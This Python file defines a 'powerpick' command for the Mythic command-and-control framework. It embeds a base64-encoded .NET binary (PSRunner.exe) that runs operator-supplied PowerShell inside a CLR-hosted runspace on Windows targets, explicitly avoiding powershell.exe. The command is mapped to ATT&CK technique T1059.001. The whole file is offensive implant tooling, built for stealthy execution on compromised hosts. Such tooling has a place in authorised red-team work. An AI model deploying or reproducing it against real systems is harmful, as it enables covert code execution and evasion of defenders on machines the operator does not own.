from mythic_container.MythicCommandBase import *
from mythic_container.MythicRPC import *
import base64


PSRUNNER_BYTES = base64.b64decode(
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v"
    "ZGUuDQ0KJAAAAAAAAABQRQAATAEDAAwuTWoAAAAAAAAAAOAAAgELAQsAAAwAAAAIAAAAAAAATioA"
    "AAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAA"
    "ABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPgpAABTAAAAAEAAAOAEAAAAAAAAAAAAAAAAAAAA"
    "AAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVAoAAAAgAAAADAAAAAIA"
    "AAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAOAEAAAAQAAAAAYAAAAOAAAAAAAAAAAAAAAAAABAAABA"
    "LnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAw"
    "KgAAAAAAAEgAAAACAAUAlCIAAGQHAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwBFAAAAAQAAEQIsBQKOaS0RKAMAAApyAQAAcG8EAAAK"
    "FyoCFpooAgAABgveHwooAwAACnInAABwBm8FAAAKKAYAAApvBAAAChcL3gAHKgAAAAEQAAAAABkA"
    "CyQAHwYAAAEbMAMATwEAAAIAABEoCAAACgoGbwkAAAooCgAACgsHBm8LAAAKBwJvDAAACiYHbw0A"
    "AAoMcw4AAAoNCG8PAAAKEwgrGxEIbxAAAAoTBBEELA4JEQRvEQAACm8SAAAKJhEIbxMAAAot3N4M"
    "EQgsBxEIbxQAAArcB28VAAAKbxYAAApvFwAAChYxTAdvFQAACm8WAAAKbxgAAAoTCSshEQlvGQAA"
    "ChMFCXI/AABwEQVvEQAACigGAAAKbxIAAAomEQlvEwAACi3W3gwRCSwHEQlvFAAACtwHbxUAAApv"
    "GgAACm8bAAAKFjFMB28VAAAKbxoAAApvHAAAChMKKyERCm8dAAAKEwYJck8AAHARBm8RAAAKKAYA"
    "AApvEgAACiYRCm8TAAAKLdbeDBEKLAcRCm8UAAAK3AlvEQAACigeAAAKFhMH3hQHbx8AAArcBm8g"
    "AAAKBm8hAAAK3BEHKgBBfAAAAgAAADYAAAAoAAAAXgAAAAwAAAAAAAAAAgAAAI8AAAAuAAAAvQAA"
    "AAwAAAAAAAAAAgAAAO4AAAAuAAAAHAEAAAwAAAAAAAAAAgAAABIAAAAmAQAAOAEAAAcAAAAAAAAA"
    "AgAAAAYAAAA5AQAAPwEAAA0AAAAAAAAAHgIoIgAACipCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMx"
    "OQAAAAAFAGwAAABMAgAAI34AALgCAAAgAwAAI1N0cmluZ3MAAAAA2AUAAGQAAAAjVVMAPAYAABAA"
    "AAAjR1VJRAAAAEwGAAAYAQAAI0Jsb2IAAAAAAAAAAgAAAUcVAggJAAAAAPolMwAWAAABAAAAFgAA"
    "AAIAAAADAAAAAgAAACIAAAACAAAAAgAAAAYAAAABAAAAAgAAAAAACgABAAAAAAAGADAAKQAGAHgA"
    "WAAGAJgAWAAGALYAKQAGAMgAvgAGAOcAKQAGAP0AKQAGAAsBWAAGAB8BWAAKAHUBTgEKAIUBTgEK"
    "AKIBMQEGAOoBywEKAPcBMQEGABMCBwIGADwCIQIGAIsCeAIGAKACKQAKALQCMQEKAM4CMQEKAOEC"
    "MQEKAPcCMQEAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAkQA3AAoAAQC0IAAACACR"
    "ADwAEAACAIwiAAAAAIYYRgAVAAMAAAABAEwAAAABAFEAEQBGABkAGQBGABUAIQDTAB4AKQDdACMA"
    "MQDxACgAOQAEASwAQQBGADgAUQCOAUcAWQCdARUAYQCtAUwAYQC0AVEAYQDBAVcAYQAAAl0AeQBG"
    "ABUADABKAm0AFABYAn0ACQBkAigAeQBtAoIAiQCXAogAkQCsAhUAYQDCAowAmQDTAJEAHADtAqEA"
    "HABKAm0AJABYAn0AmQAFA6wALADtAqEALABKAm0ANABYAn0AIQARA8MAYQCsAhUAWQAXAxUAWQCs"
    "AhUACQBGABUALgALAPAALgATAPkAMgDIAGYAdgCaAKUAtQC8AASAAAAAAAAAAAAAAAAAAAAAABcA"
    "AAAEAAAAAAAAAAAAAAABACAAAAAAAAMAAAAAAAAAAAAAAD4AMQEAAAAAAAAAPE1vZHVsZT4AUFNS"
    "dW5uZXIuZXhlAFBTUnVubmVyAG1zY29ybGliAFN5c3RlbQBPYmplY3QATWFpbgBSdW5TY3JpcHQA"
    "LmN0b3IAYXJncwBzY3JpcHQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxh"
    "dGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAENv"
    "bnNvbGUAU3lzdGVtLklPAFRleHRXcml0ZXIAZ2V0X0Vycm9yAFdyaXRlTGluZQBFeGNlcHRpb24A"
    "Z2V0X01lc3NhZ2UAU3RyaW5nAENvbmNhdABNZXRob2RJbXBsQXR0cmlidXRlAE1ldGhvZEltcGxP"
    "cHRpb25zAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24AU3lzdGVtLk1hbmFnZW1lbnQuQXV0"
    "b21hdGlvbi5SdW5zcGFjZXMAUnVuc3BhY2VGYWN0b3J5AFJ1bnNwYWNlAENyZWF0ZVJ1bnNwYWNl"
    "AE9wZW4AUG93ZXJTaGVsbABDcmVhdGUAc2V0X1J1bnNwYWNlAEFkZFNjcmlwdABTeXN0ZW0uQ29s"
    "bGVjdGlvbnMuT2JqZWN0TW9kZWwAQ29sbGVjdGlvbmAxAFBTT2JqZWN0AEludm9rZQBTeXN0ZW0u"
    "VGV4dABTdHJpbmdCdWlsZGVyAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAElFbnVtZXJhdG9y"
    "YDEAR2V0RW51bWVyYXRvcgBnZXRfQ3VycmVudABUb1N0cmluZwBBcHBlbmRMaW5lAFN5c3RlbS5D"
    "b2xsZWN0aW9ucwBJRW51bWVyYXRvcgBNb3ZlTmV4dABJRGlzcG9zYWJsZQBEaXNwb3NlAFBTRGF0"
    "YVN0cmVhbXMAZ2V0X1N0cmVhbXMAUFNEYXRhQ29sbGVjdGlvbmAxAEVycm9yUmVjb3JkAGdldF9D"
    "b3VudABXYXJuaW5nUmVjb3JkAGdldF9XYXJuaW5nAFdyaXRlAENsb3NlAAAAAAAlTgBvACAAcwBj"
    "AHIAaQBwAHQAIABwAHIAbwB2AGkAZABlAGQAABdFAFgAQwBFAFAAVABJAE8ATgA6ACAAAA9FAFIA"
    "UgBPAFIAOgAgAAATVwBBAFIATgBJAE4ARwA6ACAAAAC1wH5B+r6gQLSMZiiETuPGAAi3elxWGTTg"
    "iQUAAQgdDgQAAQgOAyAAAQQgAQEIBAAAEhUEIAEBDgMgAA4FAAIODg4FBwISGQgFIAEBESUIMb84"
    "Vq02TjUEAAASLQQAABIxBSABARItBSABEjEOCCAAFRI1ARI5BhUSNQESOQggABUSQQETAAYVEkEB"
    "EjkEIAATAAUgARI9DgMgAAIEIAASTQggABUSUQESVQYVElEBElUDIAAIBhUSQQESVQggABUSUQES"
    "WQYVElEBElkGFRJBARJZBAABAQ4nBwsSLRIxFRI1ARI5Ej0SORJVElkIFRJBARI5FRJBARJVFRJB"
    "ARJZCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzASAqAAAAAAAAAAAAAD4q"
    "AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKgAAAAAAAAAAAAAAAAAAAABfQ29yRXhlTWFpbgBt"
    "c2NvcmVlLmRsbAAAAAAA/yUAIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAIAEAAAACAAAIAYAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAUAAAgAAAAAAAAAAA"
    "AAAAAAAAAQABAAAAaAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAQAA"
    "AAAAkAAAAKBAAABMAgAAAAAAAAAAAADwQgAA6gEAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIA"
    "UwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAA"
    "AAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQA"
    "cgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBu"
    "AGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkA"
    "cAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAu"
    "ADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABQAFMAUgB1AG4AbgBlAHIA"
    "LgBlAHgAZQAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQAB"
    "AE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABQAFMAUgB1AG4AbgBlAHIALgBlAHgA"
    "ZQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAA"
    "ADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAA"
    "AAAAAO+7vzw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJ5"
    "ZXMiPz4NCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEi"
    "IG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0iMS4w"
    "LjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0idXJu"
    "OnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4NCiAgICAgIDxy"
    "ZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52"
    "MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2VyIiB1"
    "aUFjY2Vzcz0iZmFsc2UiLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3Nl"
    "Y3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+DQoAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAFA6"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
)


class PowerpickArguments(TaskArguments):
    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="script",
                cli_name="Script",
                display_name="PowerShell Script",
                type=ParameterType.String,
                description="PowerShell script to execute via CLR-hosted runspace (no powershell.exe)",
                parameter_group_info=[
                    ParameterGroupInfo(
                        required=True,
                        group_name="Default",
                        ui_position=1,
                    )
                ],
            ),
        ]

    async def parse_arguments(self):
        if self.command_line[0] == "{":
            self.load_args_from_json_string(self.command_line)
        else:
            self.add_arg("script", self.command_line)


class PowerpickCommand(CommandBase):
    cmd = "powerpick"
    needs_admin = False
    help_cmd = "powerpick -Script \"Get-Process | Select-Object -First 5\""
    description = (
        "Execute PowerShell scripts in-process via CLR hosting and "
        "System.Management.Automation runspace. Does not spawn powershell.exe."
    )
    version = 1
    supported_ui_features = []
    author = "@Lavender-exe"
    attackmapping = ["T1059.001"]
    argument_class = PowerpickArguments
    attributes = CommandAttributes(
        builtin=False,
        supported_os=[SupportedOS.Windows],
    )

    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:
        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(
            TaskID=taskData.Task.ID, Success=True,
        )

        script = taskData.args.get_arg("script") or ""

        taskData.args.add_arg(
            "runner_data",
            base64.b64encode(PSRUNNER_BYTES).decode(),
            ParameterType.String,
        )

        response.DisplayParams = f"-Script \"{script[:80]}{'...' if len(script) > 80 else ''}\""
        return response

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
